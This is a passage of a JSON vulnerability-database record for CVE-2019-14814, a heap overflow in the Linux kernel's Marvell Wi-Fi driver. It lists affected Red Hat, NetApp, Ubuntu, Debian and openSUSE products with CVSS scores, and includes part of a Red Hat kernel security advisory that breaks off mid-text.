        "version": null
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "a800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.146"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.194"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2.17"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "a220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.194"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "a320",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.75"
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16.74"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "16.04"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.04"
      },
      {
        "model": "fas2750",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "fas2720",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "5.3"
      },
      {
        "model": "enterprise linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": "enterprise mrg",
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.2.17",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.194",
                "versionStartIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.194",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.146",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.75",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.74",
                "versionStartIncluding": "3.7",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:messaging_realtime_grid:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a320_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a320:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:c190_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:c190:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a220_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a220:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas2720_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas2720:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:fas2750_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:fas2750:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a800_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu,Red Hat",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-14814",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2019-14814",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "secalert@redhat.com",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.8,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-14814",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-14814",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "secalert@redhat.com",
            "id": "CVE-2019-14814",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201908-2185",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "There is heap-based buffer overflow in Linux kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. Linux Kernel Contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel-alt security and bug fix update\nAdvisory ID:       RHSA-2020:0174-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2020:0174\nIssue date:        2020-01-21\nCVE Names:         CVE-2018-3693 CVE-2018-18559 CVE-2019-3846\n                   CVE-2019-8912 CVE-2019-10126 CVE-2019-11487\n                   CVE-2019-14814 CVE-2019-14815 CVE-2019-14816\n                   CVE-2019-17133 CVE-2019-18660\n====================================================================\n1. Summary:\n\nAn update for kernel-alt is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, noarch, ppc64le, s390x\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, noarch, ppc64le\n\n3. \n\nSecurity Fix(es):\n\n* Kernel: speculative bounds check bypass store (CVE-2018-3693)\n\n* kernel: Use-after-free due to race condition in AF_PACKET implementation\n(CVE-2018-18559)\n\n* kernel: Heap overflow in mwifiex_update_bss_desc_with_ie function in\nmarvell/mwifiex/scan.c (CVE-2019-3846)\n\n* kernel: af_alg_release() in crypto/af_alg.c neglects to set a NULL value\nfor a certain structure member, which leads to a use-after-free in\nsockfs_setattr (CVE-2019-8912)\n\n* kernel: Heap overflow in mwifiex_uap_parse_tail_ies function in\ndrivers/net/wireless/marvell/mwifiex/ie.c (CVE-2019-10126)\n\n* kernel: Count overflow in FUSE request leading to use-after-free issues. \n\nBug Fix(es):\n\n* Kernel panic on job cleanup, related to SyS_getdents64 (BZ#1702057)\n\n* Kernel modules generated incorrectly when system is localized to\nnon-English language (BZ#1705285)\n\n* RHEL-Alt-7.6 - Fixup tlbie vs store ordering issue on POWER9 (BZ#1756270)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1581650 - CVE-2018-3693 Kernel: speculative bounds check bypass store\n1641878 - CVE-2018-18559 kernel: Use-after-free due to race condition in AF_PACKET implementation\n1678685 - CVE-2019-8912 kernel: af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in sockfs_setattr\n1703063 - CVE-2019-11487 kernel: Count overflow in FUSE request leading to use-after-free issues. Package List:\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 